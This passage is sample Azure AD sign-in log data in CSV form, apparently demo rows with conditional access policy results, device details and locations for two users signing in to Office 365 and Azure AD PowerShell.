'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",ed279ba5-6389-4198-91ad-627e91520d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,ed279ba5-6389-4198-91ad-627e91520d00,SigninLogs,Sucess,50.6406517,5.572050095
+804,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:51.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4b24eaf1-dc7e-4fc3-b586-d3765f7ba614,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",fb48d823-caf0-47e0-9da1-418977de0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,fb48d823-caf0-47e0-9da1-418977de0d00,SigninLogs,Sucess,50.6406517,5.572050095
+805,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:59.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6be2e835-4217-4e97-9e88-9f79534d66b2,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 09:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",8ad00b2e-7523-45f8-a6db-5c47a7bc0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,8ad00b2e-7523-45f8-a6db-5c47a7bc0d00,SigninLogs,Sucess,50.6406517,5.572050095
+806,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:30.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b533d840-7ed9-4b53-8546-240707b12961,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5a121923-a43a-49e3-acac-67d9ec280d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5a121923-a43a-49e3-acac-67d9ec280d00,SigninLogs,Sucess,50.6406517,5.572050095
+807,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:33.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5837199f-2feb-471f-8e0a-456e069438bc,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",8ccd2b23-7303-4913-b6ad-5087f6a80d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,8ccd2b23-7303-4913-b6ad-5087f6a80d00,SigninLogs,Sucess,50.6406517,5.572050095
+808,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:51.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4b24eaf1-dc7e-4fc3-b586-d3765f7ba614,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",fb48d823-caf0-47e0-9da1-418977de0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,fb48d823-caf0-47e0-9da1-418977de0d00,SigninLogs,Sucess,50.6406517,5.572050095
+809,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:45.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4dd21dc3-8656-4832-a723-d599c17be28e,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:03,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'IE 7.0', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",74ec0c21-886d-4307-9726-326a7b2c4600,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,74ec0c21-886d-4307-9726-326a7b2c4600,SigninLogs,Sucess,32.32146072,34.85319901
+810,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:45.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4dd21dc3-8656-4832-a723-d599c17be28e,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:03,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'IE 7.0', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",74ec0c21-886d-4307-9726-326a7b2c4600,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,74ec0c21-886d-4307-9726-326a7b2c4600,SigninLogs,Sucess,32.32146072,34.85319901
